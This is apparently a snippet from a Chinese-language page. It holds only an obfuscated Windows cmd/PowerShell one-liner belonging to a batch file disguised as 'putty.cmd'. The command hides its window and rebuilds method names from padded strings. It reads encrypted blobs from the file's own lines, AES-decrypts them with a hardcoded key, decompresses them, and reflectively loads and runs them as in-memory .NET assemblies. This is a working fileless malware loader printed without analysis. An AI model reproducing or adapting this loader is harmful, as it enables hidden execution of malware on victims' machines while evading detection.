- C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\jfpoi4u\putty.cmd';$htek='ElsHXBemsHXBensHXBtsHXBAtsHXB'.Replace('sHXB', ''),'GetGPMtCtGPMurtGPMrtGPMenttGPMProtGPMctGPMesstGPM'.Replace('tGPM', ''),'SpCKJTliCKJTtCKJT'.Replace('CKJT', ''),'FrVugYomVugYBasVugYe64VugYStrVugYinVugYgVugY'.Replace('VugY', ''),'EnYFCltYFClrYFClyPoYFClinYFCltYFCl'.Replace('YFCl', ''),'CredYoRadYoRtedYoRDdYoRedYoRcrdYoRyptdYoRordYoR'.Replace('dYoR', ''),'MiOrTaiiOrTnMiOrTodiOrTuleiOrT'.Replace('iOrT', ''),'ReYIZKadYIZKLiYIZKnesYIZK'.Replace('YIZK', ''),'CoUZugpyUZugTUZugoUZug'.Replace('UZug', ''),'ThquKrhquKanshquKforhquKmFhquKinhquKahquKlhquKBlohquKckhquK'.Replace('hquK', ''),'ChyqAsayqAsngyqAseEyqAsxtyqAsenyqAssyqAsionyqAs'.Replace('yqAs', ''),'DeHTLfcoHTLfmpHTLfresHTLfsHTLf'.Replace('HTLf', ''),'IXdEinXdEivoXdEikeXdEi'.Replace('XdEi', ''),'LovUioadvUio'.Replace('vUio', '');powershell -w hidden;function cIjfW($PJzVo){$BRxzh=[System.Security.Cryptography.Aes]::Create();$BRxzh.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BRxzh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BRxzh.Key=[System.Convert]::($htek[3])('w03tzxANj19a7PrSjz1zUFr0CYrXf7EfljFjP8CLKns=');$BRxzh.IV=[System.Convert]::($htek[3])('eJ8tgpaif+FBtXcs8uy/9w==');$TdBnb=$BRxzh.($htek[5])();$GkFrN=$TdBnb.($htek[9])($PJzVo,0,$PJzVo.Length);$TdBnb.Dispose();$BRxzh.Dispose();$GkFrN;}function TiynM($PJzVo){$bDZNq=New-Object System.IO.MemoryStream(,$PJzVo);$JDhzj=New-Object System.IO.MemoryStream;$HrjFA=New-Object System.IO.Compression.GZipStream($bDZNq,[IO.Compression.CompressionMode]::($htek[11]));$HrjFA.($htek[8])($JDhzj);$HrjFA.Dispose();$bDZNq.Dispose();$JDhzj.Dispose();$JDhzj.ToArray();}$CABTf=[System.IO.File]::($htek[7])([Console]::Title);$ogfxv=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 5).Substring(2))));$mcKOZ=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 6).Substring(2))));[System.Reflection.Assembly]::($htek[13])([byte[]]$mcKOZ).($htek[4]).($htek[12])($null,$null);[System.Reflection.Assembly]::($htek[13])([byte[]]$ogfxv).($htek[4]).($htek[12])($null,$null); "
复制代码
|